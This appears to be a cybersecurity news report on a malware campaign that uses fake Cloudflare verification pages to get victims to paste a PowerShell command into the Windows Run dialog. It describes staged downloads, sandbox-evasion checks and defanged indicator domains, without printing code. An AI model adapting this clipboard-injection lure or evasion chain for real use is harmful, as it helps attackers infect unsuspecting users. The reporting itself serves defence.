Cybercriminals are leveraging a deceptive new technique involving fake Cloudflare verification screens to convince users to unwittingly install malware on their systems.
This social engineering method showcases a high degree of sophistication, preying on users’ expectations for security while subverting it for malicious ends.
Sophisticated Social Engineering Lures Users
The attack begins when unsuspecting users land on a compromised website rigged with a counterfeit Cloudflare CAPTCHA verification prompt.
Instead of performing a legitimate check, the page displays a convincing but entirely fake Cloudflare challenge, luring the victim into clicking a “Verify” button to ostensibly prove their humanity.
Upon clicking “Verify,” the site stealthily injects a PowerShell command into the user’s clipboard. This command is designed to be executed via Windows’ Run prompt.
The page then claims an additional step is needed, instructing the user to open the Run dialog (Win+R) and paste the contents of their clipboard.
Simultaneously, the malicious page records the user’s IP address and silently signals the attacker’s server via a webhook that the Run prompt has been activated.
To further increase the likelihood of user compliance, the webpage can also monitor keystrokes to detect when the Run prompt is invoked.
Technical Breakdown of the Attack
If the victim pastes and runs the PowerShell command, it fetches a second, base64-encoded PowerShell script hosted on “pastesio[.]com.”
Once decoded and executed, this script downloads a batch file (.BAT) from “axiomsniper[.]info.”
At this juncture, the batch file executes a series of checks for telltale signs of virtualization for instance, examining process listings and hardware configurations indicative of sandbox or virtual machine environments.
If any are detected, the payload halts, evading analysis and sandbox detection. For environments that pass these checks, the batch file proceeds to deploy additional malware, potentially ranging from info-stealers to ransomware.
Notably, this payload currently evades all known antivirus detection engines, with zero detections reported on VirusTotal at the time of reporting.
Such stealth underscores both the evolving sophistication of these campaigns and the ongoing cat-and-mouse dynamic between adversaries and the security community.
The campaign is being actively tracked by security researchers, who have provided threat hunting queries to help others identify and mitigate these attacks.
According to the Report, Researchers caution users and organizations to be extra vigilant when encountering unexpected verification prompts, particularly those asking for unusual actions such as copying and running code.
This attack exemplifies the increasing professionalism of social engineering ploys and the blending of technical and psychological tactics.
Users are encouraged to verify the legitimacy of CAPTCHA and security checks, avoid copying code from untrusted sources, and ensure endpoint security tools are updated though, as this campaign shows, defenses still struggle to keep pace with novel threats.
Cybersecurity professionals should proactively monitor for any communication with these domains and educate users about the risks of manually executing code inspired or delivered via web-based “verification” schemes.
Indicators of Compromise (IOCs)
| IOC | Description |
|---|---|
| dex-redirect[.]com | Phishing landing / redirect domain |
| pastesio[.]com | Hosts malicious PowerShell payload |
| axiomsniper[.]info | Distributes secondary malware (BAT) |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
